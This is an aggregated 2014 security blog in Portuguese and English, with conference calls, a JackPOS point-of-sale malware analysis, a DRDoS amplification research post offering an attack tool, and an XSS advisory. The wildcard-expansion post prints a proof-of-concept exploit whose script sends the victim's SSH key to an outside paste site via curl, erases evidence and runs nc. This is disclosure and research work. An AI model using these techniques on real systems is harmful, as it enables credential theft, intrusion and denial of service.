terça-feira, junho 24, 2014

Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

Segue um buffer overflow baseado em pilha no Android Serviço KeyStore que afeta Android 4.3 e abaixo. A questão foi  corrigida no Android 4.4.

A vulnerabilidade é identificada como CVE-2014-3100, Mais detalhes estão disponíveis em:
1 Blog Post:. http://ibm.co/1pbk4yH

Ekoparty 10 Call For Papers

Call For Papers for the 10th edition of the Ekoparty Security Conference
 and Training being held from October 29th through the 31st, 2014 in 
Latin America.
We are really proud to announce the tenth edition of the ekoparty security

This year it's going to be special as we are celebrating #eko10 We are
having new awesome location, ekoCAMP for sleep over and night activities, a
bigger after party and many more special things.

ekoparty has become the most important technical conference in Latin
America, which keeps offering the deepest knowledges in the field. We are
expecting to bring together more than 3000 security specialists! If you
have something to share THIS is the right conference, you'll regret not to
be here this year.

During the 3-day high voltage lectures, you also can enjoy activities like
around the City, free WORKSHOPS, the most important CAPTURE THE FLAG in
Latin America, not forgetting of course, our amazing parties! Also new in
this #eko10:

The cfp system is online at https://cfp.ekoparty.org
* ekoCAMP: three days of high voltage lectures is not enough? only for this
tenth edition, you can camp at ekoparty! Stay all night playing the CTF!
* ekoparty will recognize the trajectory of Latin American researchers, as
also their greatest researches. Stay tuned!
The ekoparty organization team is kindly inviting anyone who is interested
in showing and sharing his researches and/or developments in the field of
Information Security.

Topics of interest include, but are not limited to, the following:

- 0 days
- Satellite Hacking
- Web Security
- Privacy
- Embedded Systems Technologies
- GSM, GPRS and CDMA Security
- RFID Security
- VoIP Security
- Lockpicking
- Wireless Security
- Exploitation
- IPv6 Security
- Attack and Defense Techniques
- Reverse Engineering
- Application Security, Testing, Fuzzing
- Code Auditing
- Virtualization Security
- Malicious Code
- Databases Security
- Packet Pungas
- Viruses, Worms, and Trojans
- e-crime, Phishing and Botnets
- Malware, Crimeware
- NSA’s Baby shower.
- Banking Security
- Phreaking
- Unit 61398 Asado techniques
- Hardware hacking
- Cryptography
- Forensics & AntiForensics
* All the lectures are going to be simultaneously translated breaking any
language barrier.

Full length talks (50 minutes)
Turbo talks (20 minutes)
Hands-on Workshops (120 minutes)
Trainings (1 or 2 days)
Night activities
Geek games
* Speakers including a Hands-on Workshop proposal earn extra points in the

Jun 18 - CFP is Open
Jul 31 - First round of selection
Aug 29 - CFP is Closed
October 27 & 28 - ekoparty trainings
October 29, 30 & 31 - ekoparty security conference

Round-trip airfare ticket
ekoparty's ASADO (BBQ)
Extra ticket to the conference

50% net profit of the Training
3 days accommodation
ekoparty's ASADO (BBQ)
Ticket to the conference

- We are looking for new activities to be performed in parallel to the
conference and although during ekoCAMP at night. Send us your proposal to:

font: http://packetstorm.igor.onlinedirect.bg/papers/call_for/ekoparty10-cfp.txt

Askmen.com Website Allegedly Compromised Through Code Injection

Title: Askmen.com Website Allegedly Compromised Through Code Injection
Source: Ionut Ilascu, Softpedia
Date Published: 23 June 2014

"The portal is dedicated to providing news for men from domains
ranging from sports and health to social activity and entertainment.
According to their media page, there are more than 14 million readers
in U.S. alone, but the portal also has localized versions for UK,
Canada, Australia and the Middle East.
According to Websense, the landing page with the exploit is generated
automatically using a domain generation algorithm (DGA) that has been
cracked by the researchers, who also revealed the pages that would be
accessed until June 30."
Font: http://news.softpedia.com/news/Askmen-com-Website-Allegedly-Compromised-Through-Code-Injection-448032.shtml

AppSecEU 2014 live streaming

OWASP AppSec Europe 2014 will be presenting six (6) tracks of live content directly from the conference's main rooms. Event will start on June 25 and June 26 at 9:15AM GMT+1. And if you miss it, keep calm and watch later on since all the recorded content will be available into the following playlist:

Check out the official OWASP YouTube channel for live events notifications
This has been made possible by the AppSecEU 2014 Conference Team, | OWASP Media Project and Münster University of Applied Sciences IT Security Lab.

JackPOS - Another Credit Card Stealer

In a previous blog post on Dexter, we briefly mentioned a new strain of point-of sale (PoS) malware that has compromised over 4,500 credit cards in the United States and Canada. This new strain of malware, dubbed JackPOS, was detected early this year and between then and the time of writing, has had just one version, but with multiple variants.
In this blog post, we look briefly at the unique attributes of JackPOS: its custom pattern matching and its command-and-control (C&C) communication. We will conclude with quick remarks on the newest variant that was found in April.

Custom Pattern Matching

As we now know, POS malware will first dump the process memory, extract the Track 1 and/or Track 2 data information, and finally exfiltrate the stolen information to a C&C server. PoS malware can extract track data using one of two approaches: pattern matching or regular expression matching.
Custom pattern matching provides the malware authors with more control as to which type of cards to target or filter out. JackPOS’s custom pattern matching is unique as it is more specific compared to other families such as Dexter. JackPOS will only grab credit cards from specific credit card issuers. This is done by checking parts of the Issuer Identification Number (IIN), which consists of the first few digits of the Primary Account Number (PAN).
The table below shows the first digits of the IINs that JackPOS checks for, and the corresponding credit card companies.
JackPOS Table 1
Table 1. Targetted IINs and credit card companies.

C&C Communication

JackPOS makes an HTTP GET request to the hardcoded URL http://[REMOVED]/post/echo, checking for the response "up". After ensuring that the server is up and running, the infected machine registers itself with the C&C through HTTP on TCP port 80 using the standard WinINet APIs: InternetOpenW, InternetConnectW, HttpOpenRequestW, and HttpSendRequestW.
The table below shows these APIs and the parameters used.
JackPOS Table 2
Table 2. The WinINet APIs and parameters.
The content of the HTTP field-value pairs are described below.
JackPOS Table 3
Table 3. The HTTP field-value pairs.
The figure below shows an example of credit card information being exfiltrated to the C&C server. As we can see, the Track 1 and Track 2 data are simply encoded with the Base64 algorithm.
JackPOS Fig 1
Figure 1. Credit card information being exfiltrated by JackPOS.

The C&C Server Commands

The response from the C&C server can be one of three commands:
1) "update" : download and update • Connects to http://{Removed}/post/download and downloads a file to the user's Application Data folder. The filename used is selected from a list of strings that are in the malware body.
JackPOS Fig 2
Figure 2. List of filenames in the malware body.
• Updates the autorun registry entries to point to the updated file.
2) "exec" : download and execute. There is one parameter used in this command, which is the URL from which the malware will be downloaded. • Saves the executable to %Temp%\[filename].exe, then executes it. 3) "kill" • Deletes all registry entries associated with the malware. • Kills the malware process.

New Variant

In April, we acquired what appeared to be a new variant of JackPOS. After completing our analysis, we concluded that the sample from April varies only slightly from the original version. As we like to say, it is ‘old water with a new bottle’. The only significant difference is the fact that the April version is packed with a custom packing algorithm.
It is interesting to note that the strings showing the compilation path of the malware in this April version have been modified from the February versions:
1) February version • C:\Users\ziedpirate.ziedpirate-PC\Desktop\sop\sop\Release\sop.pdbC:\Users\ziedpirate.ziedpirate-PC\Desktop\sop\sop\Release\svchost.pdb
2) April version • I:\hack\dev\pos\sop\Release\sop.pdbI:\hack\dev\pos\sop\Release\svhost.pdb
As we can see, the PDB strings in the February version had revealed the Windows user account name of the malware author. From the change in these strings, we can consider two possibilities: either (1) the project was moved and recompiled in an effort to correct this; or (2) the project source code is now in the hands of other malware authors.
font: https://blog.fortinet.com/JackPOS-----Another-Credit-Card-Stealer/ 

HexorBase Audit Toolbox

"HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows ...
To install simply run the following command in terminal after changing
directory to the path were the downloaded package is:
root@host:~# dpkg -i hexorbase_1.0_all.deb"
Download: https://code.google.com/p/hexorbase/downloads/list

HITBSecConf2014 - Malaysia \o/


Topics of interest include, but are not limited to the following:
  • Cloud Security
  • File System Security
  • 3G/4G/WIMAX Security
  • SS7/GSM/VoIP Security
  • Security of Medical Devices
  • Critical Infrastructure Security
  • Smartphone / MobileSecurity
  • Smart Card and Physical Security
  • Network Protocols, Analysis and Attacks
  • Applications of Cryptographic Techniques
  • Side Channel Analysis of Hardware Devices
  • Analysis of Malicious Code / Viruses / Malware
  • Data Recovery, Forensics and Incident Response
  • Hardware based attacks and reverse engineering
  • Windows / Linux / OS X / *NIX Security Vulnerabilities
  • Next Generation Exploit and Exploit Mitigation Techniques
  • NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security

White Paper:

If your presentation is short listed for inclusion into the conference program, a technical white paper must also be provided for review (3000 - 5000 words).

Please note:

We do not accept product or vendor related pitches. If you would like to showcase your company's products or technology, please email conferenceinfo@hackinthebox.org


Want to know the WIFI password for the Brasil World Cup security center?

World Cup WiFi Password

By William Knowles
Senior Editor
InfoSec News
June 24, 2014
The Jerusalem Post is reporting that the Rishon Lezion based security company RISCO Group is providing security management at the soccer stadium in Cuiaba, Brazil.
The state-of-the-art 41,000-seat Arena Pantanal, which cost $537 million to build, is one of the 12 host venues for the World Cup.
The project includes coordinating hundreds of Internet- protocol security cameras deployed in the stadium and its surroundings, lighting systems, gates and the PA system through a command and control center.
Three games have so far been played there in the tournament, all without incident.
…except for posting the WiFi code in a Twitter photo.


Since we began our studies in the Master's degree on ICT security at the European University, drew our attention the possibility of doing a project under the guidance of Alejandro Ramos (@aramosf), a professional of the scene that we admire. After several ideas and proposals by both parties, we decided to make a project about finding new attack vectors on distributed reflection denial of service attacks (DRDOS). Recently this blog talked about it in a article focused on SNMP vulnerability, publishing also a tool for exploitation.
We set ourselves the objective of finding some new amplification in various protocols. To do this, first we made a research about already known vulnerabilities which were published by CERTs and some communities related to computer security. Swiftly we realized the technical complexities with the conditions that had to have the vulnerabilities: based on UDP, not having authentication, with an amplification of at least 2 times the bytes sent, implemented on a large number of sites... and they have to been undiscovered.

We classified our search into three frames where to look: 
  • Common UDP-based protocols (such as DNS or NTP) 
  • Media streaming and game platforms. 
  • Private Applications that use UDP
Most undocumented protocols are just strings of bytes in and out. Each of them mean something, but, if the protocol is private, only the developer knows the meaning. After months of analysis and, some frustrations, we have managed to take advantage of several implementations based on UDP that can be used to make large-scale attacks:

SIP protocol: Options method 

SIP is a signaling protocol for VoIP whose implementation is identical to HTTP-based messages. The main difference, apart from its utility, is that SIP can operate on UDP port 5060. After a Shodan search we saw that there are over 40 million devices connected. Doing some deep research through the RFC we conclude that it was possible to reduce the "OPTIONS" request to some bytes and obtain an amplified response. Those servers that implement a response to "OPTIONS" with SDP information can have a big amplification.


The returned messages had an average multiplier factor of 5 times for every byte sent, slightly above some of the protocols published by the US-CERT. Nowadays, there are over 2 million computers with this multiplier factor, so a highly distributed attack could make a dent on a big company.

Amplification in mobile games
The growth of multiplayer games is something that excited us, a very cool place to research. However, many of these games do not use UDP as transport layer, preferring to use APIs under TCP. Fortunately, most interactive games tend to use UDP, here we found serious vulnerabilities with quite high multiplication factors, some of them 500 to 700 times per byte sent The problem is that those services are not usually large enough to be considered hazardous. Additionally, some mobile gaming platforms like exitgames.com implements triple handshake implemented over UDP, which completely prevents such attacks..


Citrix ICA protocol amplification

In an almost obsessive quest to find large amplification factors, we detect that there was a property on a private protocol which had not been taken into account as a possible vector amplification UDP. The affected protocol is the Citrix ICA protocol, designed for shared application servers.

One of the features in certain versions of the protocol, is to communicate the client what shared applications exists, and also the available servers. This message is transmitted by UDP on port 1604 and it does not implement authentication. When the list of applications and servers is large enough, this information disclosure becomes an attack vector for DRDoS attacks.


With a simple payload of 84 bytes, a response with an amplification factor of 25 to 40 times for every byte sent is received. The interesting thing about this vulnerability is that in our discovery phase we detected over 12,000 Citrix servers and corroborated that at least 2,000 were vulnerable.

Operating Tool: r2dr2 DRDoS attack tool

To make our proof of concept, we have developed a full-featured UDP amplification attacks program, called "r2dr2". The main difference from other tools, is that it receives a JSON file with the configurations. There you can especify the payload of the running service in hexadecimal format, which makes it highly customizable. Our aim is that the tool will be able to exploit vulnerabilities found not only for us but also any other researcher; we have found that works very well with many protocols.

The following video demonstrates, on a real environment, a distributed amplification attack using UDP with only 10 Citrix ICA servers, that can deny service to a real server on the Internet.
Configuring payloads on r2dr2 This video only exploit Citrix ICA protocol information disclosure vulnerability, with almost 25 to 45 bandwidth amplification factor, but in the JSON file that r2dr2 receives you can configure much more payloads from different services and set the amount of times you want to use each IP. This example shown the payload required for amplification in the Citrix ICA UDP, SIP, CHARgen, and NTP protocols.

Dowload JSON configuration file for r2dr2
Download application: r2dr2 DRDoS UDP Amplification

This project has taught us much more than we expected; this is the final conclusion. Find vulnerable protocols it is not a trivial task, but as we demonstrated in the video, effectiveness is large. There will be ways to do DRDOS attacks for a long time, mitigation depends on the talent and budget of each organization.

Daniel Ferreira (@daniel0x00)
Pablo Alobera (@IllegalPointer


Open Source Digital Forensics Conference (OSDFCon)

#OSDFCon Open Source Digital Forensics Conference
The 5th Annual Open Source Digital Forensics Conference (OSDFCon) will be held on November 5, 2014 at the Westin Washington Dulles in Herndon, VA.  This conference focuses on tools and techniques that are open source and (typically) free to use.  It is a one day event with short talks packed with information.  There are both tool developers and users in attendance, and this is a unique opportunity to learn about new tools and provide feedback.
As an investigator, you should attend to learn about new tools and meet the developers building the software.  As a developer, you should attend to raise awareness of your efforts. Everyone should consider submitting a talk to share their experiences and work.

Getting Involved

The final program will be available in July.
We’ll post updates on Twitter using #osdfcon.
Developers can submit modules to the Autopsy Module Writing Contest for cash prizes. Submissions are due by October 20, 2014.

Exploiting Wildcard Expansion on Linux

Wildcard Expansion

When you type a command with a "*" in bash, bash expands it to the list of all files in the directory and passes them all as arguments to the program. For example, "rm *", will remove files in the current directory.

Filenames Misinterpreted as Switches

Most command line programs can take switches that affect how they work. For example, the ls command, when ran without any switches, looks like the output below.
[stephen@superX foo]$ ls 
asdf.txt  foobar  -l 
Now let's say you want to know what group and user owns these files. You can pass "-l" to the ls program to figure that out, which looks like this:
[stephen@superX foo]$ ls -l 
total 0 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 -l 
Notice there is a file named -l in our directory. Let's try "ls *" now and see what happens:
[stephen@superX foo]$ ls * 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
The last two outputs are similar, but the output of "ls *" is different. It is missing the "-l" file, which was interpreted by ls as the "-l" switch. There's no way for the ls program to tell that the "-l" came from the wildcard expansion and wasn't actually what we in intended. It's equivalent to running:
[stephen@superX foo]$ ls asdf.txt foobar.txt -l
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar

Security Problems

Misinterpreted filenames can lead to problems when someone runs a wildcard expansion on a folder they download from the Internet, for example, without first checking the filenames. Could this be used to attack someone's computer? Can we make a program do something bad by having specially-named files in the directory? Yes, it turns out that we can.

Known Issue

This problem is well-known, but it still surprises a lot of people. There has been some discussion of it on the Full Disclosure mailing list.
Generally, we're told that this is a "feature", and that doing anything else would be even more surprising and difficult to understand to someone who really understands what's going on. Even if that's the case, if lots of people misunderstand it, and those people can be exploited as a result, then it should be considered a security vulnerability, either in the design or in the documentation.
The posting to Full Disclosure demonstrates how wildcard expansion can be abused to make a user delete files they didn't intend to. That's annoying, but isn't too severe a problem. What we really want is to turn an improper use of "*" into code execution, and that's what we've done.

Proof of Concept Exploit

To show that it's possible to turn this problem into an arbitrary code execution attack, we attack the "scp" command. The scp command provides the "-o" option, which passes a configuration option to ssh. Luckily, ssh has a configuration option that involves running a command. We can take advantage of this to get our script running.
Suppose we have control over the contents of a directory, and inside that directory our victim will run the following command. Imagine, for example, that the user just downloaded a web application's source code from the attacker's website and is uploading the files to their web server.
$ scp * user@example.org:/var/www/
To exploit this command, in the directory we place three files:
  • "-o" - SCP will interpret this file as the "-o" switch.
  • "ProxyCommand sh supercool.sh %h %p" - SCP will interpret this file's name as the argument to the "-o" switch.
  • "supercool.sh" - The script that will run, containing the attacker's code.
  • "zzz.txt" - Another file in the directory which serves no purpose for the exploit.
It's okay to have more files in the directory, so long as none of their names fall between "-o" and "ProxyCommand" in alphabetical order, or come before "-o" in alphabetical order (bash ignores the leading dash when sorting the names, and is case-insensitive). This limitation probably makes actual attacks difficult, since the very suspicious "ProxyCommand" file will show up near the top of the directory listing, if the user does look.
Inside "supercool.sh", we have a script that will do what "ProxyCommand" is supposed to do, along with some malicious commands:

# Upload their SSH public key to the Internet, and put a scary message in /tmp/.
echo "By @DefuseSec and @redragonx..." > /tmp/you-have-been-hacked.txt
echo "This could have been your private key..." >> /tmp/you-have-been-hacked.txt
curl -s -d "jscrypt=no" -d "lifetime=864000"                                \
        -d "shorturl=yes" --data-urlencode "paste@$HOME/.ssh/id_rsa.pub"    \
        https://defuse.ca/bin/add.php -D - |                                \
        grep Location | cut -d " " -f 2 >> /tmp/you-have-been-hacked.txt

# Delete evidence of our attack.
rm ./-o ProxyCommand\ sh\ supercool.sh\ %h\ %p 
echo > ./supercool.sh

# Do what ProxyCommand is supposed to do.
nc -p 22332 -w 5 $1 $2
When the victim runs their scp command, it will appear successful:
$ scp * user@example.org:/var/www/
But, when the user checks their /tmp/ directory, they'll see our message:
$ cat /tmp/you-have-been-hacked.txt 
By @DefuseSec and @redragonx...
This could have been your private key...
You can download the entire proof of concept directory in a .zip file here. Be careful, and have fun!
This was written by @RedragonX and @DefuseSec.

sábado, junho 21, 2014

Travel by Drone.

Há dias mostrámos um projecto fantástico no mundo dos drones. Este novo conceito de drone servirá o utilizador de forma autónoma, permitirá filmar a actividade desportiva (entre outras) sem necessidade de o estar a controlar. Isso irá possibilitar imagens incríveis.
Os drones trazem essa magia das imagens aéreas ao comum dos mortais, sem grandes custos ou grandes artilharias de equipamentos. Como recolhem imagens fantásticas existe um sítio online onde agora já podem ser colocadas e partilhadas, chama-se Travel by Drone.

Este serviço é realmente muito interessante, permite-nos ver vídeos de todo o mundo, dos mais convencionais aos mais bizarros de uma forma directa gravados de uma perspectiva que só dos drones as conseguimos ver.

Como está a ficar uma técnica banal, podemos ter acesso a imagens de sítios que de outra forma seria difícil, o que nos proporciona vídeos no YouTube fantásticos.
Não tardará a que este drones estejam em qualquer sítio a gravar e teremos imagens mundiais…. e por falar em Brasil…

Existem já milhares de vídeos e de cada lugar que nem imagina que exista no nosso planeta. Há filmes de erupções vulcânicas, de férias nas Caraíbas, tudo ao alcance da sua escolha. Abra o TravelByDrone navegue no mapa mundo, depois nesses pinos que estão em cada lugar identificam que lá existe um vídeo.

Qualquer pessoa poderá colocar os seus trabalhos no Travel by Drone, basta para isso informar o local onde aconteceu a gravação, disponibilizar o URL do vídeo e um email de contacto. Por razões de segurança todos os vídeos têm de ser inspeccionados pela equipa responsável pelo serviço, pois a ideia é mesmo garantir que este é gravado por um drone e não por um qualquer outro meio e só depois é colocado no mapa. No lado mais à direita estão os vídeos mais recentes.

A europa já conta com muitos, não sei se serão os Estados Unidos ou a Europa com mais vídeos, mas é fascinantes ver imagens de todos os países e de ângulos super curiosos. Tirem as vossas opinião em TravelByDrone

fonte: http://pplware.sapo.pt/internet/travel-by-drone-veja-o-mundo-pelos-olhos-dos-drones/

Rabbit-hole WIFI

About Us

Rabbit-hole was created in order to provide a community environment to those individuals working on the fringes of existing UAV communities. Rabbit-hole.org is for project/ideas that may not be tolerated or understood by the common hobbyist. That being said, let me make a very important point clear: We DO NOT support or condone any illegal activity. Some ideas presented on rabbit-hole MAY have potential illegal applications, but they also have legal applications as well. We do not tolerate discussions supporting or related to the commission of actual illegal activities.

We are two guys with backgrounds in computer security. When we get bored, it’s almost always a recipe for trouble. This recipe started cooking back in October of 2009 and the results were something we call the Wireless Aerial Surveillance Platform. It’s an autonomous Unmanned Aerial Vehicle (UAV) that we built in our garage with onboard war-driving gear, among other things.

It didn’t take long before we decided Wi-Fi networks weren’t enough. So we added Bluetooth, Cellular, and imaging capabilities that we can easily add and remove based on our needs. It all plugs into an onboard USB hub, so the possibilities are infinite. Oh, and we’re not Dutch. Mike (a.k.a. RedQueen) lives in Indiana. Rich (a.k.a. WhiteQueen) lives in Illinois. We’re Midwest, corn-fed Americans. Not that there’s anything wrong with being Dutch.

Our goals were relatively simple. We wanted it to be cheap enough that we wouldn’t go broke building it. Not wanting to scratchbuild every component, it needed to use as much off-the-shelf equipment as possible. It needed to fly long enough to be able to do something interesting. One person should be able to load it in and out of a station wagon without any special equipment. Finally, and most importantly, we wanted anyone to be able to follow in our footsteps without needing to be a PhD, electrical engineer, or aeronautical engineer.

The airframe is a surplus U.S. Army target practice drone. A DIY Drones “ArduPilot” (based on the popular Arduino) controls the avionics. An onboard Via Epia Pico ITX PC with a Via C7 500 MHz CPU with 1 GB RAM, running the Backtrack 4 suite provides the “surveillance” capabilities. It communicates with a ground station for real-time tracking, payload interaction, flight operations, and data download. An ArduStation in the base station receives the telemetry data. The base station allows us to establish a Secure Shell link via a PPP tunnel. Additionally, it can serve as a network router for connecting additional workstations to the payload system.

The UAV also contains an 4G connection, giving the aircraft onboard Internet connectivity. This connection allows the operator to control the payload from anywhere in the world — including mobile devices. It also allows for processor-intensive applications, such as WPA attacks and password cracking, to be offloaded securely in real-time to a remote computing powerhouse utilizing CUDA technology, for mind-blowing performance.

Altogether, the UAV weighs approximately 13 pounds, with a length of 76 inches and a wingspan of 67 inches. Its flight time is approximately 30-45 minutes, with a maximum estimated altitude of around 22,000 feet. It flies a preprogrammed set of GPS coordinates, while collecting data, and returns to base. We can also interrupt the course, and cause the UAV to “loiter” around an interesting target, allowing us more time to investigate.
RedQueen     WhiteQueen

Mike Tassey is a security consultant to Wall Street, and the US Intelligence Community. He spent the majority of his 16 year information security career in support of the Dept. of Defense (both in uniform and out) and now does security consulting for global companies and government. His interests include martial arts, lolcats, danger and putting large things in small airplanes.     Rich Perkins is an avid radio control enthusiast and a senior security engineer supporting the U.S. Government. He has had a 20 year Information Technology career including programming, Enterprise Administration, and Information Security. Hobbies include hiking, SCUBA diving, R/C, computers and electronics, as well as a penchant for voiding warranties.

Fonte: https://rabbit-hole.org/about/

Volatility Interface & Extensions

Volatility Interface & Extensions

This project aims to develop a software to extend the use and simplify the handling of the Volatility Framework .
Objectives of VOLIX:
  • Simplify the handling of Volatility
    • Provide a more intuitive GUI handling
    • Reduce complex command sequences to a single click
    • Improving usability
  • Increase analysis speed (no tedious typing of commands)
  • Make comparison and correlation of results easier
  • Offer assistance / examples
  • Provide new functions
  • Automated search for malware and analysis of the findings by VirusTotal
  • Detecting of hidden processes and network connections
  • Integrate existing and new plug-Ins
  • Provide a graphical analysis of images in the form of diagrams and/or statistics
  • Generate reports
  • *NEW* Complete support of the Volatility Framework 2.3.1
    • With all Linux and MacOS plugins
  • *NEW* Improved helpfile with a complete investigation example
  • *NEW* A questionaire can be filled in, that will be analysed by VOLIX II and based on this the plugins will be inserted
  • *NEW* The investigation is now mostly automated
  • *NEW* A new plugin will be started as soon as another one ends
    • Up to three plugins will run simultaneously
    • Results are parsed to set parameters for the plugins that are started next
  • *NEW* A complete final report can now be created at any time
  • *NEW* John the Ripper was integrated into Volix II to crack SAM hashes

Load RAM Image
Malware search
Malware results

*NEW* Crack SAM-Hashes

*NEW* Final report
Information on the project:
  • The project started in Spring 2013 and is still ongoing.
  • Comments and suggestions are appreciated.
  • If you want to be kept informed about this project, subscribe to our Volix Newsletter (you need to register for that).
Members of the project team:
Current project members:
Patrick Bock
Rene Woelker
Former projekt members:
Steffen Logen
Messages to the VOLIX-Team:
Current version:
SHA256:   343205d1a8a9f22415696b50d803509bb96667c362b2a561bacb8ecfb1cd6786
SHA1:       80b6f66ecb7759567933b76229c21c89542bcbfe
MD5:     8d2081441f4a41bdcccfb16ef411504c

Previous versions:
SHA256:    568c587e5e80e91e64f6171a80bc9ed919c71ee8a90ea5be8be8c509170c570a
SHA1:     34b08e56f347dbb372e73b1332f870d46debfc5e
MD5:      831f69ad71d32cc522e3d792e481c7e7
SHA256:   104f60d27e56f02e268a1929383388d7c8896b77a3cf02ae4f557fb081a55617
SHA1:     d4f881cddbc5515aa9cde20de367791b1738bc69
MD5:     60db58eccc5052ebbd66a5e2972021b5
Manual (German)
Material from ARES 2012:
© FH Aachen (2011-2014)

font: http://www.it-forensik.fh-aachen.de/projekte/volix/13 

Warning: You are entering the XSS game area \o/

Warning: You are entering the XSS game área

Welcome, recruit!

Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!

At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.

In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.

There will be cake at the end of the test.

Let me at 'em!


XSS on Panasonic

          - XSS on Panasonic site-

Advisory: security.panasonic.com – Cross-Site Script Vulnerability (XSS)
Advisory ID:  969061
Author: Roberto Garcia (@1gbDeInfo)
Affected Software: Successfully tested on  security.panasonic.com Vendor
URL: http://security.panasonic.com
Vendor Status: reported 2 times but not solved

Vulnerability Description
The website " security.panasonic.com " is prone to a XSS vulnerability.

This vulnerability involves the ability to inject arbitrary and unauthorized
javascript code. A malicious script inserted into a page in this manner can
hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page.



  Reported 2 times but not solved

Disclosure Timeline
- Report vuln Jun 4, 2014 via email to samuel.garcia@ext.eu.panasonic.com
- Reported again via web Jun 12, 2014. They answer me:

        Dear Mr. Garcia,
        Thank you for your prompt e-mail reply.
        egarding your enquiry, I am writing to confirm having forwarded your
message to the corresponding department.

        Kind Regards,
        Customer Service Team
        Panasonic UK

Afected sites:
  - vftr.panasonic.co.jp
  - security.panasonic.com
  - panasonic.ney

Vulnerability found and advisory written by Roberto Garcia (@1gbDeInfo)

Best regards.
Roberto Garcia Amoriz
Linkedin: es.linkedin.com/in/rogaramo/
Web:  http://www.1gbdeinformacion.com
Twitter: @1gbdeinfo

sexta-feira, junho 20, 2014

Webrsnapshot - backup


Webrsnapshot is a web interface for rsnapshot programmed in Perl (Mojolicious), JS, CSS and HTML of course.

The Idea
I had the idea to implement some kind of GUI for rsnapshot since I'm using it. Even I am an experienced Linux Administrator I find in some cases such GUI is much more useful as editing the text file over the console. The Idea to implement some more features like "restore" to the same or custom path got me started working on this project.
Until now I used the Windows backup, Mac's Time Machine and BackupPC. But none of them has proved himself like rsnapshot with robustness and simplicity.  I mean, I had to live with such idiotic problems like impossibility to restore backup, because the OS was updated and the connection encoding was changed or impossibility to restore backup, while the machine was reinstalled and some id's had changed. With BackupPC I (still) have the problem, that the files are stored in some kind of binary form and are not direct over the file system accessible or you have to stop the current running backup until you can restore some file. Well, I don't have so much time to waste for such an idiotic things. 
Since I'm using rsnapshot already for years, I decided to develop some kind of web interface. For a long time I was wondering whatprogramming language to use and it seems that Perl was the only reasonable, because rsnapshot is Perl based, so Perl have to be installed on the backup server anyway. Webrsnapshot is based on Mojolicious (Perl) web framework. On the other side this eliminates the need of web-server, because Mojolicious already have HTTP and WebSocket client/server implementation with IPv6, TLS and so on.


Source :The Webrsnapshot source can be found on my github: https://github.com/dobrevg/webrsnapshot

Download:git clone https://github.com/dobrevg/webrsnapshot.git  <your-target-dir>

Demo : You can find a demo version here. While saving the configuration you can experience some error messages, but that is ok. This is read-only demo and it doesn't save the changes.

User/Pass are demo/demo.